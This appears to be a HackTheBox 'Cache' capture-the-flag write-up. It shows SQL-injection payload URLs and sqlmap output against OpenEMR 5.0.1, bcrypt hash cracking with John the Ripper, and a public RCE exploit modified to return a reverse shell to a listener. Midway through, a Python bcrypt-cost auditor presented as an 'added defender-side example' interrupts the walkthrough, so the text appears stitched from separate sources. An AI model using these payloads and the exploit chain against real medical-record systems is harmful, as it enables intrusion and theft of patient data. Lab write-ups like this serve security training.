```
# Nmap 7.80 scan initiated Fri Jun 12 13:19:40 2020 as: nmap -sSVC -p- -oA nmap_full 10.10.10.188
Nmap scan report for 10.10.10.188
Host is up (0.021s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 12 13:20:07 2020 -- 1 IP address (1 host up) scanned in 26.73 seconds
```
There are many exploits, but we don't know which version this is.
Usually I never go to the EDB website and only use searchsploit, but this time
we don't know the version in use; the only thing we know is that it was probably
a version released in 2018, as the copyright notice is from 2018.
Searching on the EDB website gives us the publication date of each exploit,
so with some luck we can begin with the exploits published in 2018.
```
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS     10.10.10.188     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT      80               yes       The target port (TCP)
SSL        false            no        Negotiate SSL/TLS for outgoing connections
TARGETURI  /                yes       The base path to the OpenEMR installation
VHOST      hms.htb          no        HTTP server virtual host
```
When we run it we can see the exploit works, but it seems poorly written: it
tries to dump all 295 tables, system tables included, and it's pretty slow.
```
msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > run

[*] Running module against 10.10.10.188
[*] DB Version: 5.7.30-0ubuntu0.18.04.1
[*] Enumerating tables, this may take a moment...
[*] Identified 295 tables.
[*] Dumping table (1/295): CHARACTER_SETS
[*] Dumping table (2/295): COLLATIONS
```
So let's exit that; the msf module would take hours to extract all those useless
tables.
Now that we know this SQLi is working, let's see exactly which exploit it is:
```
Provided by:
  Will Porter <will.porter@lodestonesecurity.com>

Check supported: Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     10.10.10.188     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The base path to the OpenEMR installation
  VHOST      hms.htb          no        HTTP server virtual host

Description:
  This module exploits a SQLi vulnerability found in OpenEMR version
  5.0.1 Patch 6 and lower. The vulnerability allows the contents of the
  entire database (with exception of log and task tables) to be extracted.
  This module saves each table as a `.csv` file in your loot directory and
  has been tested with OpenEMR 5.0.1 (3).
```
In Metasploit you can use the `edit` command to open your default editor on
the module's source code.
By doing that I read the code of the msf module and saw how it detects the
OpenEMR version, in the `openemr_version` method:
```
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:51:36 /2020-07-14/

[21:51:36] [INFO] fetched random HTTP User-Agent header value 'Opera/8.51 (X11; Linux i686; U; en)' from file '/opt/sqlmap/data/txt/user-agents.txt'
[21:51:37] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('OpenEMR=b9g6um1rbhc...dmd5cln601'). Do you want to use those [Y/n] n
[21:52:08] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
[21:52:08] [INFO] testing if the target URL content is stable
[21:52:38] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[21:54:08] [CRITICAL] connection timed out to the target URL
[21:54:08] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[21:54:24] [CRITICAL] can't check dynamic content because of lack of page content
[21:54:24] [INFO] heuristic (basic) test shows that GET parameter 'enc' might be injectable (possible DBMS: 'MySQL')
[21:54:24] [INFO] testing for SQL injection on GET parameter 'enc'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[21:54:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:55:29] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
[21:55:29] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[21:56:25] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[21:57:55] [CRITICAL] connection timed out to the target URL
[21:58:25] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[21:59:55] [CRITICAL] connection timed out to the target URL
[22:00:25] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[22:01:55] [CRITICAL] connection timed out to the target URL
[22:02:25] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
there seems to be a continuous problem with connection to the target. Are you sure that you want to continue? [y/N] N
[22:03:36] [ERROR] user quit
[22:03:36] [WARNING] you haven't updated sqlmap for more than 84 days!!!

[*] ending @ 22:03:36 /2020-07-14/
```
It's kinda working but pretty slow and unstable, so let's find another endpoint, as there
seem to be many SQLi.
```
portal/find_appt_popup_user.php?catid=1' AND (SELECT 0FROM(SELECT COUNT(*),CONCAT(@@VERSION,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -
portal/add_edit_event_user.php?eid=1 AND EXTRACTVALUE(0,CONCAT(0x5c,VERSION()))
interface/forms/eye_mag/php/Anything_simple.php?display=i&encounter=1' AND (SELECT 0 FROM(SELECT COUNT(*),CONCAT(@@VERSION,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -&category_name=POSTSEG
interface/forms_admin/forms_admin.php?id=32' OR (SELECT 0 FROM(SELECT COUNT(*),CONCAT(@@VERSION,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -&method=enable
```
The ones in 3.1 and 3.2 (portal) seem to give a SQL error, while those from 3.3
to 3.9 seem to require authentication.
Those two requests won't work without valid cookies, even though the attack is unauthenticated.
So we need to fill in the registration form with random data; even if we never receive the confirmation email, this sets a valid cookie.
```
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:28:23 /2020-07-14/

[23:28:23] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1' from file '/opt/sqlmap/data/txt/user-agents.txt'
[23:28:23] [INFO] resuming back-end DBMS 'mysql'
[23:28:23] [INFO] testing connection to the target URL
[23:28:23] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: eid=(SELECT (CASE WHEN (8435=8435) THEN 1 ELSE (SELECT 1164 UNION SELECT 9741) END))

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: eid=1 AND EXTRACTVALUE(4452,CONCAT(0x5c,0x71787a7a71,(SELECT (ELT(4452=4452,1))),0x717a716271))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: eid=1 AND (SELECT 5294 FROM (SELECT(SLEEP(5)))KKhg)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: eid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71787a7a71,0x73535a4b567775646f4d7849526d4b6d4a697572466f44734446724d5072526b7079474c6a616242,0x717a716271),NULL-- -
---
[23:28:23] [INFO] the back-end DBMS is MySQL
[23:28:23] [INFO] fetching banner
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.1
banner: '5.7.30-0ubuntu0.18.04.1'
[23:28:23] [INFO] fetched data logged to text files under '/home/noraj/.sqlmap/output/hms.htb'
[23:28:23] [WARNING] you haven't updated sqlmap for more than 84 days!!!

[*] ending @ 23:28:23 /2020-07-14/
```
Alternatively you can store the raw HTTP request in a file:
Let's put the hash in a file to crack it with [JtR][JtR]:
```
$ printf %s '$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.' > hash.txt
$ john -w /usr/share/wordlists/password/rockyou.txt --format=bcrypt hash.txt
Warning: invalid UTF-8 seen reading /usr/share/wordlists/password/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx           (?)
1g 0:00:00:01 DONE (2020-07-15 00:51) 0.6369g/s 722.2p/s 722.2c/s 722.2C/s water..zombie
Use the "--show" option to display all of the cracked passwords reliably
Session completed
$ john --show hash.txt
?:xxxxxx
```
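Why this hash fell in one second is visible in its prefix: `$2a$05$` is a bcrypt work factor of 5, i.e. 2^5 = 32 rounds, which is exactly the `Cost 1 (iteration count) is 32` John reports. As an added defender-side example (my code, not from the writeup), here is a parser for the bcrypt string format plus a policy check; `min_cost=10` is an assumed policy threshold, and `projected_rate` extrapolates the 722.2 c/s John measured to other costs under the assumption that throughput halves with each cost step.

```python
import re
from typing import List, NamedTuple

# bcrypt modular-crypt string: $<ident>$<cost>$<22-char salt><31-char digest>,
# salt and digest in bcrypt's own base64 alphabet (./A-Za-z0-9).
_BCRYPT_RE = re.compile(
    r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$"
)

class BcryptHash(NamedTuple):
    ident: str
    cost: int
    salt: str
    digest: str

    @property
    def rounds(self) -> int:
        # cost is a log2 work factor: the expensive key setup runs 2**cost times
        return 2 ** self.cost

def parse_bcrypt(hash_str: str) -> BcryptHash:
    """Parse a bcrypt string, rejecting anything that is not well-formed."""
    m = _BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError("not a well-formed bcrypt hash")
    ident, cost, salt, digest = m.groups()
    if not 4 <= int(cost) <= 31:
        raise ValueError(f"bcrypt cost {cost} outside the valid range 4..31")
    return BcryptHash(ident, int(cost), salt, digest)

def projected_rate(observed_rate: float, observed_cost: int, target_cost: int) -> float:
    """Guesses/s expected at target_cost given a rate measured at observed_cost.
    Each cost step doubles the work, so the rate halves (assumes linear scaling)."""
    return observed_rate / 2 ** (target_cost - observed_cost)

def audit(hash_str: str, min_cost: int = 10) -> List[str]:
    """Return findings for a stored hash; an empty list means it meets the policy."""
    h = parse_bcrypt(hash_str)
    findings = []
    if h.cost < min_cost:
        findings.append(f"cost {h.cost} ({h.rounds} rounds) is below the minimum of {min_cost}")
    return findings

# The hash recovered in the writeup (cost 05) and the 722.2 c/s John reported for it.
WRITEUP_HASH = "$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B."
OBSERVED_RATE = 722.2

if __name__ == "__main__":
    print(audit(WRITEUP_HASH))
    print(f"{projected_rate(OBSERVED_RATE, 5, 12):.1f} c/s expected at cost 12")
```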
```
Copied to: /home/noraj/CTF/HackTheBox/machines/Cache/48515.py
```
Let's modify the remote URL, LHOST, LPORT and the admin credentials.
Then start a listener and launch the exploit:
```
$ pwncat -l 8888 -vv
INFO: Listening on :::8888 (family 10/IPv6, TCP)
INFO: Listening on 0.0.0.0:8888 (family 2/IPv4, TCP)
INFO: Client connected from 10.10.10.188:32838 (family 2/IPv4, TCP)
Linux cache 4.15.0-109-generic #110-Ubuntu SMP Tue Jun 23 02:39:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 23:11:40 up 32 min,  0 users,  load average: 0.07, 0.02, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
```

```
$ python2 48515.py
[+] Authentication with credentials provided please be patient
[+] Uploading a payload it will take a minute
[+] You should be getting a shell
```
```
$ telnet 127.0.0.1 11211
telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
version
version
VERSION 1.5.6 Ubuntu
```